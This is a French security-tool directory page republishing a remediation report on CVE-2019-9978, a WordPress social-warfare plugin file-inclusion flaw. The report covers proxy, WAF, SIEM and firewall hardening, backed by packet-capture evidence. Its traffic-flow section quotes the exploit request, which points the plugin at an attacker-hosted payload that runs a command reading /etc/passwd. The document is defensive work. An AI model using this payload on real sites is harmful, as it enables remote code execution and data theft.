Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Vuln_Remediation_MegaQuagga — Rapport de remédiation pour MegaQuagga Publishing validant l'atténuation de CVE-2019-9978 grâce à un blindage défensif progressif. Documente l'insertion d'un proxy inverse, le déploiement du WAF ModSecurity, l'intégration du SIEM Graylog et l'application de SSL/TLS à l'aide d'une analyse Wireshark PCAP en plusieurs étapes sur les interfaces WAN et LAN de pfSense. | Kitploit
Outils/GitHubGitHub/b4ntgrim/vuln_remediation_megaquagga
Outils DéfensifsAnalyse des VulnérabilitésSécurité WebSécurité RéseauApprentissage et ÉducationRéponse aux IncidentsAnalyse de Journaux
GitHubb4ntgrim/vuln_remediation_megaquagga

Vuln_Remediation_MegaQuagga

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
3il y a 4 moisPas encore vérifié

À propos

Rapport de remédiation pour MegaQuagga Publishing validant l'atténuation de CVE-2019-9978 grâce à un blindage défensif progressif. Documente l'insertion d'un proxy inverse, le déploiement du WAF ModSecurity, l'intégration du SIEM Graylog et l'application de SSL/TLS à l'aide d'une analyse Wireshark PCAP en plusieurs étapes sur les interfaces WAN et LAN de pfSense.

Partager

Vuln_Remediation_MegaQuagga

Rapport de remédiation pour MegaQuagga Publishing validant l'atténuation de CVE-2019-9978 grâce à un empilement défensif progressif. Documente l'insertion d'un proxy inverse, le déploiement du WAF ModSecurity, l'intégration du SIEM Graylog, et l'application SSL/TLS via une analyse multi-étape des captures PCAP Wireshark sur les interfaces WAN et LAN de pfSense.

Correction de vulnérabilité — Rapport de remédiation MegaQuagga

Analyste : Samuel Weiss Organisation : 0x2A Security Version : 1.1 (27 avril 2026) Client : MegaQuagga Publishing Classification : CONFIDENTIEL


Aperçu

Ce projet documente la remédiation active des vulnérabilités identifiées lors du test d'intrusion de MegaQuagga, avec un accent particulier sur CVE-2019-9978 (inclusion de fichier distant via le plugin WordPress social-warfare). La remédiation a été validée par une analyse multi-étape des captures de paquets à l'aide de Wireshark sur les interfaces WAN et LAN de pfSense, avec des contrôles défensifs progressifs appliqués et retestés à chaque étape.


Fichiers

FichierDescription
_VULN_REMEDIATION__MegaQuagga_Remediation_Report__Samuel_Weiss_.docxRapport de remédiation complet comprenant le résumé exécutif, les actions entreprises, les preuves de remédiation basées sur PCAP et les recommandations prospectives
_VULN_REMEDIATION__PCAP_worksheet__Samuel_Weiss_.xlsxFeuille de calcul d'analyse PCAP documentant les fichiers de capture de paquets, le flux de trafic à chaque étape de remédiation, les adresses IP source/destination, les ports et les annotations de flux TCP

Périmètre

  • Vulnérabilité traitée : CVE-2019-9978 — Inclusion de fichier distant (RFI) via le plugin WordPress social-warfare
  • Environnement : Serveur WordPress MegaQuagga Publishing avec pare-feu pfSense
  • Approche : Empilement défensif progressif avec réexécution de l'exploit après chaque contrôle pour valider l'efficacité

Actions de remédiation effectuées

1. Insertion d'un proxy inverse

Un proxy inverse a été déployé devant le serveur web WordPress, modifiant l'architecture réseau afin qu'aucun trafic direct vers le serveur d'application backend ne soit plus possible depuis le réseau externe. Les preuves PCAP ont confirmé le routage du trafic via la couche proxy.

2. Pare-feu applicatif web (WAF) — ModSecurity

ModSecurity a été activé en tant que couche WAF sur le proxy inverse. Lors de la réexécution de l'exploit RFI, la charge malveillante swp_url a été bloquée et le serveur a renvoyé une HTTP 403 Forbidden, confirmant que la règle WAF se déclenchait sur la signature de l'exploit. L'activité d'alerte a été confirmée dans le SIEM Graylog.

3. Intégration SIEM — Graylog

Graylog a été configuré pour fournir une agrégation centralisée des logs et une surveillance des alertes. Des règles d'alerte ModSecurity ont été déployées pour détecter les signatures d'exploit RFI, offrant une visibilité en temps réel sur les tentatives d'attaque.

4. Application SSL/TLS et durcissement du pare-feu

  • Un certificat SSL valide a été déployé sur le proxy inverse avec déchargement SSL configuré
  • Les règles du pare-feu WAN de pfSense ont été mises à jour pour n'autoriser que le HTTPS sur le port 443
  • Les règles NAT ont été mises à jour pour refléter la nouvelle politique d'entrée
  • Lors du nouveau test, la charge malveillante RFI a été bloquée et n'a pas pu pénétrer l'environnement

Journal de capture PCAP

FichierDateInterfaceFiltrePaquetsÉtape
Red-Team-1.pcapng2025-01-03eth0 (Red-Team)none4 013Référence pré-remédiation
Red-Team-2.pcapng2026-04-22eth0 (Red-Team)none26 841Pré-remédiation (exploit confirmé)
pfSense-WAN-1.pcap2026-04-22em0 (WAN)192.168.100.x46Trafic d'exploit côté WAN capturé
pfSense-LAN-1.pcap2026-04-23em1 (LAN)192.168.100.x39Trafic d'exploit côté LAN (pré-proxy)
pfSense-LAN-2.pcap2026-04-23em1 (LAN)port 80/800045Après insertion du proxy inverse
pfSense-LAN-3.pcap2026-04-24em1 (LAN)port 80/8000/4431 000Après activation du WAF (403 Forbidden confirmé)
pfSense-LAN-4.pcap2026-04-25em1 (LAN)port 81/8000/443534Après déchargement SSL (exploit bloqué)

Flux de trafic de l'exploit — Analyse clé des paquets

Pré-remédiation (Red-Team-1 / pfSense-LAN-1)

root@kitploit:~
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[attacker]:8000/payload.txt
[WordPress] → GET /payload.txt (récupère la charge PHP hébergée par l'attaquant)
[Attacker]  → Renvoie : <pre>system('cat /etc/passwd')</pre>
[WordPress] → Renvoie le contenu de /etc/passwd à l'attaquant ✅ EXPLOIT RÉUSSI

Après WAF (pfSense-LAN-3)

root@kitploit:~
[Attacker] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=...
[WAF]       → HTTP 403 Forbidden ✅ EXPLOIT BLOQUÉ

Après application SSL (pfSense-LAN-4)

root@kitploit:~
[Attacker] → HTTPS uniquement ; port HTTP 80 bloqué au niveau du WAN pfSense
[pfSense]  → La charge malveillante ne peut pas atteindre le serveur web ✅ EXPLOIT BLOQUÉ

Recommandations prospectives

  1. Maintenir les plugins à jour et audités — Mettre à jour social-warfare vers la v3.5.3+ ; supprimer les plugins inactifs pour réduire la surface d'attaque
  2. Maintenir les règles du pare-feu — Réviser périodiquement les règles pfSense ; maintenir le port 80 bloqué ou redirigé vers HTTPS
  3. Surveiller en continu les alertes SIEM — Réviser et mettre à jour régulièrement les règles d'alerte Graylog ; attribuer les alertes à un responsable pour une réponse rapide
  4. Effectuer des analyses de vulnérabilité régulières — Planifier des analyses de routine sur le serveur WordPress et l'infrastructure environnante ; corriger selon des délais basés sur la sévérité
  5. Appliquer le principe du moindre privilège — Restreindre les processus du serveur web et les comptes utilisateur WordPress aux permissions minimales requises

Description GitHub

Rapport de remédiation pour MegaQuagga Publishing validant l'atténuation de CVE-2019-9978 grâce à un empilement défensif progressif. Documente l'insertion d'un proxy inverse, le déploiement du WAF ModSecurity, l'intégration du SIEM Graylog, et l'application SSL/TLS via une analyse multi-étape des captures PCAP Wireshark sur les interfaces WAN et LAN de pfSense.

Télécharger l’outil